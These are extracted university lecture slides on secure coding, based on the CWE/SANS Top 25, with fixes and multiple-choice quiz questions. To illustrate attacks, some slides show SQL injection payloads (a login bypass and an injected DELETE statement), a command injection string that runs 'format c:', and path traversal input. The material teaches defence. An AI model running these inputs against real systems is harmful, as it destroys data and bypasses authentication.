![Page 1: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/1.jpg)
Secure Software
Professional Recommendations from
CWE/SANS
![Page 2: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/2.jpg)
References
Material is from:: 2009 CWE/SANS Top 25 Most Dangerous Programming Errors, Version 1.4, Oct
29, 2009. CISA ® Certified Information Systems Auditor All-in-One Exam Guide, Peter H
Gregory, McGraw-Hill
Author: Susan J Lincke, PhD Univ. of Wisconsin-Parkside
Contributors: Megan Reid, Todd Burri
Funded by National Science Foundation (NSF) Course, Curriculum and Laboratory Improvement (CCLI) grant 0837574: Information Security: Audit, Case Study, and Service Learning.
Any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and/or source(s) and do not necessarily reflect the views of the National Science Foundation.
![Page 3: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/3.jpg)
Objectives
Define attacks: Buffer overflow, SQL injection, OS command injection, cross-site scripting, cleartext, race condition, chatty error message
Define solutions: Sanitization, whitelist, blacklist, nonce, character encoding (UTF-8), jail or sandbox environment
Recognize major coding errors. Modify a Requirements Document to include
Security Requirements
![Page 4: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/4.jpg)
Problem: Incorrect Input
Car SaleModel: Chevrolet XR2 Price $: 25.45VIN: 12K4FG436DDE842 Status: New
Sale to: Rubber Ducky2222 Atlantic OceanAntarctica, NY, 00000
Phone: 911 VISA: RUAFOOL444
![Page 5: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/5.jpg)
Problem: Buffer overflow
Name Zzzzzzzzzz
Count 49, 425,222
State: 84
Return
address
0x246625
Frame
pointer
0x246625
Enter Name: Zzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzzzzzzz zzzzzzzzzzzzzzzzzzzz
![Page 6: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/6.jpg)
Fix: Input Validation
Assume all input is malicious! Validate: Length Type Syntax Context: Business RulesOr Use Special input checkers
Struts or OWASP ESAPI Validation API
Whitelist: List of acceptable input Blacklist: Reject suspect input
network
ValidateFirst!!!
![Page 7: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/7.jpg)
Problem: Insecure Interaction Between Components
network
real ->
fake
->
Problem: Server assumes validation occurred in client Does not recheck
Attack: Code is reverse engineered and modified to act differently.
Program B
Program B*
![Page 8: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/8.jpg)
Fix:Server-Side Authentication
Perform authentication and input validation on both client and server sides
Use encryption & hash between client & server
networkreal ->
![Page 9: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/9.jpg)
Problem:SQL Injection Java Original: “SELECT * FROM
users_table WHERE username=” + “’” + username + “’” + “ AND password = “ + “’” + password + “’”;
Inserted Password: Aa’ OR ‘’=’ Java Result: “SELECT * FROM
users_table WHERE username=’anyname’ AND password = ‘Aa’ OR ‘ ‘ = ‘ ‘;
Inserted Password: foo’;DELETE FROM users_table WHERE username LIKE ‘%
Java Result: “SELECT * FROM users_table WHERE username=’anyname’ AND password = ‘foo’; DELETE FROM users_table WHERE username LIKE ‘%’
Login:
Password:
Welcome to My System
![Page 10: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/10.jpg)
Fix: Input Sanitization
Avoid dynamically-constructed query strings
Disallow Meta-charactersPersistence Software: Oracle DBMS_ASSERT MySQL
mysql_real_escape_string() for C, PHP
Hibernate or Enterprise Java Beans if used properly Persistence Layer
Database
Business Logic
GUI - Validation
![Page 11: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/11.jpg)
Problem: OS Command Injection
Problem: Command Injection into SQL
Inserts ‘|shell(“cmd /c echo “ & char(124) & “format c:”)|’ Data and control can
traverse same path
Login:
Password:
Welcome to My System
![Page 12: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/12.jpg)
Fix: Avoid OS Command Injection Separate control information from data information.
E.g. where data-> database, control defines application Use library calls instead of external processes Avoid external control of command input Run code in “jail” or other sandbox environment (discussed in
further detail on next slide) Provide lowest possible permissions for executable
Control: Start WPI session, parms -lmk
Data: “Terry, Brian, Jerry, Ann, Louis, …”
![Page 13: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/13.jpg)
Define Jail & Sandbox
Jail
OS imposes resource limits on programs. It may include:I/O bandwidth capsdisk quotasnetwork access restrictions restricted file system namespace
Sandbox
Quarantines an untrusted program as it runsCan execute untested/ untrusted programs from untrusted third-parties, suppliers, and users.
![Page 14: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/14.jpg)
Problem:External Control of Critical State DataUser-side data can be
modified: Cookies Configuration files Profiles Hidden form fields Environmental variables Registry keys
Web request
Web Form
Form with fake data
![Page 15: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/15.jpg)
Fix:Control Critical State Data Understand all locations that are
accessible to attackers Do not keep state info on client without
using encryption and integrity checking (e.g. HMAC)
Store state info on server side only: ASP.NET View State, OWASP ESAPI Session Mgmt
![Page 16: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/16.jpg)
Problem:Insecure Interaction Between Components Web servers are
memoryless Do not remember
sending a form to a client – what type, info
Client side can remove checks, insert other code, return unexpected data, etc.
Web access
Web Formwith javascript
Revised form
With data and java script
Modifiesjavascriptto avoiderrorchecks
![Page 17: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/17.jpg)
Problem:Cross-Site Scripting
A reputable site has links to an unknowingly disreputable site
The disreputable site generates a Javascript or VB script, which gets inserted into the reputable company’s html response.
The result looks like a valid web page from the reputable company.
E.g.: Error: Page not found
Web access
to product
link
Web Formwith javascript attack
reference
Should beerror (NotFound)Instead: fakeform
![Page 18: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/18.jpg)
Fix:Preserve Web Page Structure Specify strong character encoding such as
UTF-8 or ISO-8859.Use on outputCheck on inputOr use other encoders: MS Anti-XSS library,
OWASP ESAPI Encoding, Apache Wicket Validate not only input data, but all parts of
the HTTP input.
![Page 19: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/19.jpg)
Problem:Forgery
Web access
Web Formwith javascript
Fake form
With data and java script
Real form
Also known as Cross-Site Request Forgery
![Page 20: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/20.jpg)
Problem:Improper Access Control
Web access
Web Form need authenticationReply to www.abc.com/123
Web Request for
www.abc.com/345
Web Form for actual datafor www.abc.com/345
Web Reply w. authent.
To www.abc.com/123
cache
Web Form for actual datafor www.abc.com/345
![Page 21: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/21.jpg)
Fix:Access Permissions Use Role-Based Access
At least permissions: anonymous, normal, privileged, administrative Verify access control at server side Sensitive pages are never cached and must have active
authorization token Only provide higher level access when you need it; always run with
the minimum possible authorization level Check that files read have the required access level permissions;
administrators may not set them properly. Use a good random number generator when generating random
session keys – if not random, attackers will figure out next key sequence
![Page 22: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/22.jpg)
Problem:Incorrect Access Permissions
Database Program
Sales AccountingManufac-
turing
Sell on WebSell to
DistributorAdjust Price
Add Inventory
Ship Order
What permissions to use for these forms???
![Page 23: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/23.jpg)
Fix:Prevent Forgery Use a nonce for each
form (a number or CAPTCHA generated for a specific use, such as session authentication)
Verifier not predictable If dangerous operation,
send a separate confirmation request
Name: Ann Winkler
Address: 2526 Pratt Ave
Racine WI
Phone: 262-595-2111
Interests: Horses, Movies, Travel
Security Code: Johnson Rivers
Submit
Security Code:
Johnson
Rivers
![Page 24: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/24.jpg)
Problem:Cleartext Transmit of Sensitive Info
Fix: Encrypt data with standard, reliable encryption
before transmission
Login: Ginger Password: Snap
![Page 25: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/25.jpg)
Problem:Race Condition
Thread P1 Thread P2 Commentcin >> input; .. // read in "hello" into global.. cin >> input; // read in "good-bye" into globalout = input; out = input; // do a string copy (...use strcpy())cout << out; .. // print out "good-bye".. cout << out; // print out "good-bye“
Fix: Use Synchronization Primitives around critical code Minimize use of shared resources Test using artificial delays in race window Identify and trigger error conditions
Result: Data Corruption & Denial of Service
![Page 26: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/26.jpg)
Problem:Chatty Error Messages“Cannot find file:
C:/users/Lincke/validation.txt”
“Invalid password for login ID”
“Lab.cs.uwp.edu error: divide by zero error”
Fix: Error messages
should avoid file, network configuration, and PII information.
Must be helpful to user
Remove debug info before release
![Page 27: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/27.jpg)
Problem:External Control of Path If you download an external file or navigate to a URL – and execute If you provide access to a file on your system
Attacker can insert ../../ and access files outside privilege.
Fix: Run as low-privilege user Provide fixed input values Run code in ‘jail’: Unix chroot jail and AppArmor
Submit File:Enter pathname: BrowseBrowse
![Page 28: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/28.jpg)
Problem:Adopting Untrusted SoftwareFix: Use monitoring tools that
examine processes as it interacts with the OS Truss (Solaris) Strace (Linux) FileMon, RegMon, Process
Monitor, Sysinternals (Windows)
Sniffers, Protocol analyzers
Download
File
Free Software … Is it Safe?
![Page 29: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/29.jpg)
Problem:Other Security ErrorsFind the errors:Security() { String contents, environment; String spath = “security.dat” File security = new File(); if (security.open(spath) >0) contents = security.read(); environment = security.read(); else print(“Error: Security.dat not found”);}
![Page 30: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/30.jpg)
Problem:Other Security ErrorsFind the errors:Security() { String contents, environment; String spath = “security.dat” File security = new File(); if (security.open(spath) >0) contents = security.read(); environment = security.read(); else print(“Error: Security.dat not
found”);}
1. Variables contents & environment not initialized Can cause problems if executed
in certain ways Attacker can initialize or read
variables from previous session2. “security.dat” is not full
pathname. File can be replaced if run from
another location3. File ‘security’ not closed
Leaves file open to attack Keeps unnecessary resources
busy4. Error message indicates file
name Can give attacker important info
![Page 31: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/31.jpg)
Problem:More Security ErrorsFind the errors:purchaseProduct() { password = “N23m**2d3”; count = form.quantity; // input total = count * product.cost(); Message m = new Message( name,product,total); m.myEncrypt(); server.send(m);}
![Page 32: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/32.jpg)
Problem:More Security ErrorsFind the errors:purchaseProduct() { password = “N23m**2d3”; count = form.quantity; total = count * product.cost(); Message m = new Message( name,password,product,total); m.myEncrypt(); server.send(m);}
Errors:1. Password is hardcoded
If attacker finds it, every system can be broken into before software is changed on all computers
Passwords may only be stored in encrypted file
2. Total may overflow, producing very small number Input is not checked (could be
zero or invalid)3. Encryption should be standard
algorithm Home-written variety can be
broken into easily
![Page 33: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/33.jpg)
Fix: Test All Software!!! Dynamic Tools: use large test suites such as fuzz
testing, robustness testing, and fault injection. Software may slow down but should not crash or generate incorrect results
Use automated static analysis tools, e.g., warnings on program analysis tools
Use manual tests such as penetration testing, threat modeling, and interactive tools to reach beyond auto testing tools
Run program under low memory conditions, insufficient privileges, interrupt a transaction or disable connectivity before transaction completed.
![Page 34: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/34.jpg)
Definition Matching
Whitelist
Blacklist
Nonce
Jail
Sandbox Environment
1. A set of resource limits imposed on programs by the operating system kernel (e.g. I/O bandwidth caps & disk quotas).
2. Uses a time-sensitive mark to prevent packet replay (e.g. CAPTCHA)
3. List of acceptable input
4. A security mechanism for quarantining untrusted running programs.
5. Reject suspect input
![Page 35: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/35.jpg)
Definition Matching
Whitelist
Blacklist
Nonce
Jail
Sandbox Environment
1. A set of resource limits imposed on programs by the operating system kernel (e.g. I/O bandwidth caps & disk quotas).
2. Uses a time-sensitive mark to prevent packet replay (e.g. CAPTCHA)
3. List of acceptable input
4. A security mechanism for quarantining untrusted running programs.
5. Reject suspect input
![Page 36: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/36.jpg)
Question
A third party inserts attack data into another organization’s html response. This is known as:
1. Cross-Site Scripting2. Blacklist3. Race Condition4. Cleartext
![Page 37: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/37.jpg)
Question
What technique would NOT be appropriate in avoiding OS Command Injection?
1. Separate control information from data information
2. Use library calls instead of external processes
3. Run code in “jail” or other sandbox environment
4. Use a hard-coded password to enable access
![Page 38: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/38.jpg)
Question
Which of the following is true concerning web servers?
1. Servers cannot retain web session state, and thus the client must do it
2. The single best place to do input validation and authentication is at the client-side
3. Using client as storage is safe if encryption and integrity checking are used
4. The server can trust web input if it validates the data in the web form
![Page 39: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/39.jpg)
Question
The BEST way to ensure input validity at the client is:
1. Nonce
2. Whitelist
3. Blacklist
4. Integrity Checking
![Page 40: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/40.jpg)
Question
The BEST implementation of Access Control would be:
1. Do not provide caches for sensitive data
2. Always use minimal possible permissions in code, for as short of a time as possible
3. Avoid using cookies and hidden fields
4. Never provide an authorization above ‘guest’ to web users
![Page 41: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/41.jpg)
Question
SQL Injection is BEST protected against by using:
1. Cleartext
2. Encryption and Integrity Checking
3. Sanitization
4. Clearly defined code such as UTF-8
![Page 42: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/42.jpg)
Question
The main way to avoid replay between a client and server is:
1. Integrity checking
2. Whitelist
3. Blacklist
4. Nonce
![Page 43: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/43.jpg)
Question
An attack that could cause the MOST problems includes:
1. Hard-coded password
2. Race condition
3. Denial of Service
4. Chatty error message
![Page 44: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/44.jpg)
Question
The BEST way to ensure no message modification occurs is:
1. Hashing
2. Whitelist
3. Blacklist
4. Encryption
![Page 45: Secure Software Professional Recommendations from CWE/SANS](https://reader036.vdocument.in/reader036/viewer/2022062304/56649d0e5503460f949e30e2/html5/thumbnails/45.jpg)
Question
All of the following EXCEPT which answer can result in invalid data AND break-in?
1. Non-random random number generator
2. Buffer overflow
3. Uninitialized variables resulting in error messages
4. Race conditions